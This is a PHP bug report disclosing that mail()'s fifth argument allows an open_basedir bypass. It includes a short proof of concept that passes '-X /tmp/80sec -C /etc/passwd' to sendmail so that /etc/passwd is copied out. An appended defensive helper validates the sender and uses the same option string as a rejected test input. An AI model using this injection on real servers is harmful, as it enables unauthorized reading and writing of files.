From: root at 80sec dot com
Operating system: linux
PHP version: 5.2.9
PHP Bug Type: Safe Mode/open_basedir
Bug description: php mail function open_basedir bypass

Description:
------------
The mail function may bypass open_basedir or read/write arbitrary files.

Reproduce code:
---------------
<?php
$to = 'jian...@80sec.com'.str_repeat("x",10000);
$subject = 'the subject'.str_repeat("x",10);
$message = 'hello'.str_repeat("x",10);
mail($to, $subject, $message, $headers,"-v -bt -X /tmp/80sec -d13 -C /etc/passwd");
?>

Expected result:
----------------
We can get the contents of /etc/passwd in /tmp/80sec.

Actual result:
--------------
We can get the contents of /etc/passwd in /tmp/80sec.

-- 
Edit bug report at http://bugs.php.net/?id=48229&edit=1
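
The following is an added example, not part of the original bug report or of PHP itself: one way for application code to keep arbitrary sendmail options such as the -X and -C flags above out of mail()'s fifth argument, by building that argument only from a validated envelope sender. The names safe_mail() and envelope_sender_param() and the address pattern are assumptions made for illustration.

```php
<?php
// Added example (hypothetical helper names), not code from the bug report.

/**
 * Build mail()'s fifth argument from an envelope sender address only.
 * Anything that could introduce a further sendmail option is rejected.
 */
function envelope_sender_param($sender)
{
    // Conservative pattern (an assumption, not a full RFC 5321 parser):
    // no whitespace, quotes, slashes or other characters that could end the
    // address and start a new option such as -X <file> or -C <file>.
    if (!is_string($sender)
        || !preg_match('/\A[A-Za-z0-9._+-]+@[A-Za-z0-9.-]+\z/', $sender)
        || $sender[0] === '-') {
        throw new InvalidArgumentException('rejected envelope sender');
    }
    return '-f' . $sender;
}

/**
 * Wrapper that never forwards a caller-supplied option string to mail().
 */
function safe_mail($to, $subject, $message, $headers = '', $sender = null)
{
    if ($sender === null) {
        // No fifth argument at all: the MTA runs with its default options.
        return mail($to, $subject, $message, $headers);
    }
    return mail($to, $subject, $message, $headers, envelope_sender_param($sender));
}

// Constructed inputs: a plain sender address, and the option string from
// the report, which must be refused rather than passed to the MTA.
$candidates = array(
    'bounce@example.org',
    '-v -bt -X /tmp/80sec -d13 -C /etc/passwd',
);
foreach ($candidates as $candidate) {
    try {
        echo 'accepted: ', envelope_sender_param($candidate), "\n";
    } catch (InvalidArgumentException $e) {
        echo 'rejected: ', $candidate, "\n";
    }
}
```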